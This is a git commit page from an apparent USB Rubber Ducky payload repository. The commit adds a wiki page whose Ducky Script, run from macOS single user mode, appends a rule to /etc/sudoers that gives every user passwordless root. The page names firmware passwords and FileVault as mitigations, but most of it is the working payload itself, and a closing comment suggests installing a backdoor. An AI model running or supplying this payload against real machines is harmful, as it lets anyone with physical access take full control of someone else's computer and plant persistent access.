Robot
/
wiki-rubber-ducky-usb
2
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Created Payload - OSX Sudo for all users w/o password (markdown)

This commit is contained in:
Jesse Wallace 2017-05-22 23:12:08 -04:00
parent e8bf6c1ab8
commit 18ce50fc4f
1 changed files with 21 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
Payload---OSX-Sudo-for-all-users-w-o-password.md Normal file
View File

@ -0,0 +1,21 @@
**Author: Jesse Wallace (@c0deous)**
**[c0deo.us](https://c0deo.us/)**
This script adds a line into /etc/sudoers that enables sudo for ALL users **without requiring a password.** Only requirement is a reboot into [single user mode](https://support.apple.com/en-us/HT201573).
**Mitigation**
Setup a [firmware password](https://support.apple.com/en-us/HT204455) or enable [FileVault](https://support.apple.com/en-us/HT204837) disk encryption.
```
REM MacOS AllSudo
REM Enables Sudo access for all users without a password
REM First boot the machine into single user mode - https://support.apple.com/en-us/HT201573
REM (You could probably script single user mode but I couldn't be bothered to play with the timings)
REM By Jesse Wallace (@c0deous)
REM https://c0deo.us/
DELAY 1000
STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now
ENTER
REM Now would be a great time to install a backdoor. Ez root ;3
REM TODO Use visudo for edits (unconfirmed if working)